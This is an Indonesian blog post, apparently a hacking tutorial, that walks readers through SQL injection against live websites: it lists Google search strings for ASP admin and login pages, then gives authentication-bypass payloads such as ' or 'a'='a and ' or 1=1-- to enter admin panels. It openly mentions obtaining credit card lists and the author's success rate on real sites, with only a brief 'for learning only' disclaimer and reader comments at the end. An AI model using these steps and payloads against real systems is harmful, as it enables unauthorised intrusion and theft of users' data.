SQL Injection adalah memasukkan kode-kode SQL untuk mendapatkan akses ke database yang lebih besar daripada yang seharusnya kita dapatkan, terutama pada script yang tidak memvalidasi input dari user.
SQL Injection sebenarnya sudah sering dibahas dimana-mana, tetapi ternyata masih banyak webmaster yang belum tahu atau tidak peduli akan kelemahan ini.
Apa saja yang diperlukan untuk melakukan SQL Injection ?
1. Internet Explorer (wajib)
2. PC yang terhubung ke Internet (wajib, kecuali Anda mau hack PC Anda sendiri)
3. Segelas kopi untuk menghilangkan rasa kantuk (optional)
4. Metallica (optional)
OK, langsung saja kita praktekkan, supaya lebih jelas.
Pertama bukalah www.google.com (google pancen oye) untuk mencari script yang terhubung ke database. Masukkan salah satu keyword di bawah ini (lengkap dengan tanda petiknya) :
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
“root/login.asp”
“admin/index.asp”
Anda bisa menambahkan daftarnya berdasarkan kreatifitas Anda sendiri.
Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name dan password).
Masukkan kode-kode berikut,
User name : ‘ or ‘a’=’a
Password : ‘ or ‘a’=’a
(termasuk tanda petiknya)
Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about, dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google. Menurut pengalaman saya, dari sekitar 20 link yang saya coba, ada satu atau dua yang berhasil.
Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ‘ or ‘a’=’a
Di bawah ini bisa dimasukkan baik ke user name maupun password :
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Anda masih bisa memperpanjang daftarnya sesuai kreatifitas Anda.
Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.
Selamat berburu . . . .
Referensi :
SQL injection Basic Tutorial by Comsec
Advanced SQL Injection In SQL Server Applications by Chris Anley
Jasakom.com
yogyafree.net
sekali lagi ini hanya untuk pemberlajaran saja bukan untuk menjadi seorang perusak yang dapat merugikan orang lain....
diatas langit masih ada langit masssssssss................
3 Komentar
mas boleh saya belajar dari mas kan ?
BalasHapusboleh, tapi saya juga masih pemula kok. kalau sama² belajar ngak apa² lah.
BalasHapusmas... ikutan dong belajar barengnya.Pengen bisa ne mas ..
BalasHapusBerikan Komentar yang bermanfaat dan sehat.